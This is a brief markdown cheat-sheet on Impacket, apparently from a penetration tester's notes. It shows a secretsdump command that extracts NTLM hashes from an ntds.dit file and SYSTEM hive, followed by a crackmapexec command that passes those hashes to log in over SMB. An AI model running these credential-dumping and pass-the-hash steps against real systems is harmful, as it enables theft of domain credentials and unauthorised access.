# Impacket

* [Repo](https://github.com/SecureAuthCorp/impacket)

## Secretsdump
* `ntds.dit` and `system.hive` are needed
```sh
secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
````
* Remove everything but the hashes
* Use it to log in on the target
```sh
crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
```